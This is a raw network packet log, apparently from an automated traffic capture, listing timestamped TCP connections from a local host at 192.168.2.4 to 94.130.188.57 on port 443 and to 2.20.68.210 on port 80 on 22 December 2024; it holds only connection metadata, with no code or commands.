                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004291058 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004296064 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004354000 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004359961 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004401922 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004409075 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004424095 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004436016 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004482031 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004489899 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004532099 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004538059 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004558086 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004564047 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004576921 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004580021 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004600048 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004611969 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004657030 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004662991 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004673004 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004679918 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004688978 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004698038 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004730940 CET49766443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:47:56.004736900 CET4434976694.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.168595076 CET4434978294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.168643951 CET49782443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.168664932 CET4434978294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.168697119 CET49782443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.168730021 CET49782443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.168734074 CET4434978294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:04.168754101 CET4434978294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.152179003 CET4434978894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.152275085 CET49788443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.152735949 CET49788443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.152787924 CET4434978894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.154311895 CET49788443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.154372931 CET4434978894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.154464006 CET49788443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.154498100 CET4434978894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.177622080 CET49788443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.177716017 CET4434978894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.178051949 CET49788443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.178119898 CET4434978894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.912579060 CET4434978294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.912652969 CET4434978294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.912668943 CET49782443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.912730932 CET49782443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.913634062 CET49782443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:05.913729906 CET4434978294.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:06.670078039 CET4434978894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:06.670238972 CET4434978894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:06.670315027 CET49788443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:06.670315027 CET49788443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:06.671046972 CET49788443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:06.671130896 CET4434978894.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:06.789947033 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:06.789982080 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:06.790071011 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:06.790416956 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:06.790429115 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:07.828161001 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:07.828207016 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:07.828274012 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:07.828572989 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:07.828589916 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:07.880616903 CET4972480192.168.2.42.20.68.210
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.001171112 CET80497242.20.68.210192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.001396894 CET4972480192.168.2.42.20.68.210
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.199373960 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.199435949 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.199812889 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.199817896 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.201453924 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.201457977 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.201543093 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.201559067 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.201627970 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.201649904 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.201742887 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.201836109 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.201905966 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.201919079 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.201973915 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.201994896 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.202049971 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.202203035 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.202240944 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.202310085 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.202361107 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.202393055 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.202410936 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.202419996 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.202476025 CET49794443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:08.202491999 CET4434979494.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.231734037 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.231817007 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.232214928 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.232223988 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.233927011 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.233932972 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234025955 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234039068 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234108925 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234122038 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234136105 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234142065 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234188080 CET49800443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:09.234199047 CET4434980094.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414619923 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414771080 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414802074 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414814949 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414875984 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414899111 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414930105 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414977074 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.414978981 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415004969 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415023088 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415071964 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415111065 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415117979 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415153027 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415163040 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415206909 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415222883 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415256023 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415271044 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415290117 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415349007 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415381908 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.415424109 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.427418947 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.455327988 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.455447912 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.455460072 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.455476999 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.455511093 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.474287987 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.503334999 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.655477047 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.655657053 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.655713081 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.655841112 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.655893087 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.656001091 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.699347019 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.699552059 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.747327089 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.776760101 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.776850939 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.776881933 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.776921988 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777000904 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777080059 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777152061 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777163982 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777240038 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777252913 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777318954 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777415991 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777504921 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777518034 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777586937 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777597904 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777667999 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777681112 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.777748108 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.819336891 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.895207882 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.895298004 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.895411015 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.895462990 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.895545959 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.895622015 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.895704985 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.895783901 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.895832062 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.895968914 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.896073103 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.896153927 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.896712065 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.896809101 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.896840096 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.896878004 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.896977901 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.897037983 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.897135973 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.897216082 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.897321939 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.897407055 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:13.897433043 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.132643938 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.132652998 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.132711887 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.136425972 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.136473894 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.136569977 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.136590958 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.136622906 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.136699915 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.136769056 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.136869907 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.136883020 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.136975050 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.136979103 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.137065887 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.137166977 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.137211084 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.137322903 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.138922930 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.139092922 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.139411926 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.141334057 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146241903 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146272898 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146289110 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146362066 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146430016 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146456003 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146500111 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146545887 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146580935 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146601915 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146615028 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146655083 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146691084 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146698952 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146732092 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146732092 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146739960 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146756887 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146805048 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146837950 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146876097 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146893978 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146929979 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146938086 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146941900 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.146989107 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147028923 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147058964 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147064924 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147100925 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147102118 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147140980 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147175074 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147186995 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147211075 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147222042 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147254944 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147294044 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147396088 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147430897 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147507906 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147566080 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147635937 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147779942 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147856951 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147886992 CET4434981194.130.188.57192.168.2.4
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.147965908 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.148003101 CET49811443192.168.2.494.130.188.57
                                                                                                                                                                                                                                                                          Dec 22, 2024 22:48:14.148058891 CET4434981194.130.188.57192.168.2.4
